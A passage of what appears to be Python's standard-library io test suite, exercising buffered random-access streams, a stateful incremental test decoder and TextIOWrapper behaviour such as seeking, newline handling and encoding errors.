self.assertFalse(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) def test_weakref_clearing(self): brw = self.tp(self.MockRawIO(), self.MockRawIO()) ref = weakref.ref(brw) brw = None ref = None # Shouldn't segfault. class CBufferedRWPairTest(BufferedRWPairTest): tp = io.BufferedRWPair class PyBufferedRWPairTest(BufferedRWPairTest): tp = pyio.BufferedRWPair class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest): read_mode = "rb+" write_mode = "wb+" def test_constructor(self): BufferedReaderTest.test_constructor(self) BufferedWriterTest.test_constructor(self) def test_uninitialized(self): BufferedReaderTest.test_uninitialized(self) BufferedWriterTest.test_uninitialized(self) def test_read_and_write(self): raw = self.MockRawIO((b"asdf", b"ghjk")) rw = self.tp(raw, 8) self.assertEqual(b"as", rw.read(2)) rw.write(b"ddd") rw.write(b"eee") self.assertFalse(raw._write_stack) # Buffer writes self.assertEqual(b"ghjk", rw.read()) self.assertEqual(b"dddeee", raw._write_stack[0]) def test_seek_and_tell(self): raw = self.BytesIO(b"asdfghjkl") rw = self.tp(raw) self.assertEqual(b"as", rw.read(2)) self.assertEqual(2, rw.tell()) rw.seek(0, 0) self.assertEqual(b"asdf", rw.read(4)) rw.write(b"123f") rw.seek(0, 0) self.assertEqual(b"asdf123fl", rw.read()) self.assertEqual(9, rw.tell()) rw.seek(-4, 2) self.assertEqual(5, rw.tell()) rw.seek(2, 1) self.assertEqual(7, rw.tell()) self.assertEqual(b"fl", rw.read(11)) rw.flush() self.assertEqual(b"asdf123fl", raw.getvalue()) self.assertRaises(TypeError, rw.seek, 0.0) def check_flush_and_read(self, read_func): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) self.assertEqual(b"ab", read_func(bufio, 2)) bufio.write(b"12") self.assertEqual(b"ef", read_func(bufio, 2)) self.assertEqual(6, bufio.tell()) bufio.flush() self.assertEqual(6, bufio.tell()) self.assertEqual(b"ghi", read_func(bufio)) raw.seek(0, 0) raw.write(b"XYZ") # flush() resets the read buffer bufio.flush() bufio.seek(0, 0) self.assertEqual(b"XYZ", read_func(bufio, 3)) def test_flush_and_read(self): self.check_flush_and_read(lambda bufio, *args: bufio.read(*args)) def test_flush_and_readinto(self): def _readinto(bufio, n=-1): b = bytearray(n if n >= 0 else 9999) n = bufio.readinto(b) return bytes(b[:n]) self.check_flush_and_read(_readinto) def test_flush_and_peek(self): def _peek(bufio, n=-1): # This relies on the fact that the buffer can contain the whole # raw stream, otherwise peek() can return less. b = bufio.peek(n) if n != -1: b = b[:n] bufio.seek(len(b), 1) return b self.check_flush_and_read(_peek) def test_flush_and_write(self): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) bufio.write(b"123") bufio.flush() bufio.write(b"45") bufio.flush() bufio.seek(0, 0) self.assertEqual(b"12345fghi", raw.getvalue()) self.assertEqual(b"12345fghi", bufio.read()) def test_threads(self): BufferedReaderTest.test_threads(self) BufferedWriterTest.test_threads(self) def test_writes_and_peek(self): def _peek(bufio): bufio.peek(1) self.check_writes(_peek) def _peek(bufio): pos = bufio.tell() bufio.seek(-1, 1) bufio.peek(1) bufio.seek(pos, 0) self.check_writes(_peek) def test_writes_and_reads(self): def _read(bufio): bufio.seek(-1, 1) bufio.read(1) self.check_writes(_read) def test_writes_and_read1s(self): def _read1(bufio): bufio.seek(-1, 1) bufio.read1(1) self.check_writes(_read1) def test_writes_and_readintos(self): def _read(bufio): bufio.seek(-1, 1) bufio.readinto(bytearray(1)) self.check_writes(_read) def test_write_after_readahead(self): # Issue #6629: writing after the buffer was filled by readahead should # first rewind the raw stream. for overwrite_size in [1, 5]: raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 4) # Trigger readahead self.assertEqual(bufio.read(1), b"A") self.assertEqual(bufio.tell(), 1) # Overwriting should rewind the raw stream if it needs so bufio.write(b"B" * overwrite_size) self.assertEqual(bufio.tell(), overwrite_size + 1) # If the write size was smaller than the buffer size, flush() and # check that rewind happens. bufio.flush() self.assertEqual(bufio.tell(), overwrite_size + 1) s = raw.getvalue() self.assertEqual(s, b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size)) def test_write_rewind_write(self): # Various combinations of reading / writing / seeking backwards / writing again def mutate(bufio, pos1, pos2): assert pos2 >= pos1 # Fill the buffer bufio.seek(pos1) bufio.read(pos2 - pos1) bufio.write(b'\x02') # This writes earlier than the previous write, but still inside # the buffer. bufio.seek(pos1) bufio.write(b'\x01') b = b"\x80\x81\x82\x83\x84" for i in range(0, len(b)): for j in range(i, len(b)): raw = self.BytesIO(b) bufio = self.tp(raw, 100) mutate(bufio, i, j) bufio.flush() expected = bytearray(b) expected[j] = 2 expected[i] = 1 self.assertEqual(raw.getvalue(), expected, "failed result for i=%d, j=%d" % (i, j)) def test_truncate_after_read_or_write(self): raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 100) self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled self.assertEqual(bufio.truncate(), 2) self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases self.assertEqual(bufio.truncate(), 4) def test_misbehaved_io(self): BufferedReaderTest.test_misbehaved_io(self) BufferedWriterTest.test_misbehaved_io(self) def test_interleaved_read_write(self): # Test for issue #12213 with self.BytesIO(b'abcdefgh') as raw: with self.tp(raw, 100) as f: f.write(b"1") self.assertEqual(f.read(1), b'b') f.write(b'2') self.assertEqual(f.read1(1), b'd') f.write(b'3') buf = bytearray(1) f.readinto(buf) self.assertEqual(buf, b'f') f.write(b'4') self.assertEqual(f.peek(1), b'h') f.flush() self.assertEqual(raw.getvalue(), b'1b2d3f4h') with self.BytesIO(b'abc') as raw: with self.tp(raw, 100) as f: self.assertEqual(f.read(1), b'a') f.write(b"2") self.assertEqual(f.read(1), b'c') f.flush() self.assertEqual(raw.getvalue(), b'a2c') def test_interleaved_readline_write(self): with self.BytesIO(b'ab\ncdef\ng\n') as raw: with self.tp(raw) as f: f.write(b'1') self.assertEqual(f.readline(), b'b\n') f.write(b'2') self.assertEqual(f.readline(), b'def\n') f.write(b'3') self.assertEqual(f.readline(), b'\n') f.flush() self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n') # You can't construct a BufferedRandom over a non-seekable stream. test_unseekable = None # writable() returns True, so there's no point to test it over # a writable stream. test_truncate_on_read_only = None class CBufferedRandomTest(BufferedRandomTest, SizeofTest): tp = io.BufferedRandom @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedRandomTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_garbage_collection(self): CBufferedReaderTest.test_garbage_collection(self) CBufferedWriterTest.test_garbage_collection(self) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedRandom"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedRandomTest(BufferedRandomTest): tp = pyio.BufferedRandom # To fully exercise seek/tell, the StatefulIncrementalDecoder has these # properties: # - A single output character can correspond to many bytes of input. # - The number of input bytes to complete the character can be # undetermined until the last input byte is received. # - The number of input bytes can vary depending on previous input. # - A single input byte can correspond to many characters of output. # - The number of output characters can be undetermined until the # last input byte is received. # - The number of output characters can vary depending on previous input. class StatefulIncrementalDecoder(codecs.IncrementalDecoder): """ For testing seek/tell behavior with a stateful, buffering decoder. Input is a sequence of words. Words may be fixed-length (length set by input) or variable-length (period-terminated). In variable-length mode, extra periods are ignored. Possible words are: - 'i' followed by a number sets the input length, I (maximum 99). When I is set to 0, words are space-terminated. - 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' self.buffer = bytearray() return output codecEnabled = False @classmethod def lookupTestDecoder(cls, name): if cls.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=cls) # Register the previous decoder for testing. # Disabled by default, tests will enable it. codecs.register(StatefulIncrementalDecoder.lookupTestDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") os_helper.unlink(os_helper.TESTFN) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, "ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(os_helper.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(os_helper.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(os_helper.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(os_helper.TESTFN, "wb") as f: f.write(line*2) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(os_helper.TESTFN, "wb") as f: f.write(data) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. # Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(os_helper.TESTFN, 'wb') f.write(data) f.close() f = self.open(os_helper.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(os_helper.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. def test_read_by_chunk(self): # make sure "\r\n" straddles 128 char boundary. txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB")) reads = "" while True: c = txt.read(128) if not c: break reads += c self.assertEqual(reads, "A"*127+"\nB") def test_writelines(self): l = ['ab', 'cd', 'ef'] buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_userlist(self): l = UserList(['ab', 'cd', 'ef']) buf = self.BytesIO() txt = self.TextIOWrapper(buf) txt.writelines(l) txt.flush() self.assertEqual(buf.getvalue(), b'abcdef') def test_writelines_error(self): txt = self.TextIOWrapper(self.BytesIO()) self.assertRaises(TypeError, txt.writelines, [1, 2, 3]) self.assertRaises(TypeError, txt.writelines, None) self.assertRaises(TypeError, txt.writelines, b'abc') def test_issue1395_1(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") # read one char at a time reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_2(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = "" while True: c = txt.read(4) if not c: break reads += c self.assertEqual(reads, self.normalized) def test_issue1395_3(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read(4) reads += txt.readline() reads += txt.readline() reads += txt.readline() self.assertEqual(reads, self.normalized) def test_issue1395_4(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) reads += txt.read() self.assertEqual(reads, self.normalized) def test_issue1395_5(self): txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii") txt._CHUNK_SIZE = 4 reads = txt.read(4) pos = txt.tell() txt.seek(0) txt.seek(pos) self.assertEqual(txt.read(4), "BBB\n") def test_issue2282(self): buffer = self.BytesIO(self.testdata) txt = self.TextIOWrapper(buffer, encoding="ascii") self.assertEqual(buffer.seekable(), txt.seekable()) def test_append_bom(self): # The BOM is not written again when appending to a non-empty file filename = os_helper.TESTFN for charset in ('utf-8-sig', 'utf-16', 'utf-32'): with self.open(filename, 'w', encoding=charset) as f: f.write('aaa') pos = f.tell() with self.open(filename, 'rb') as f: 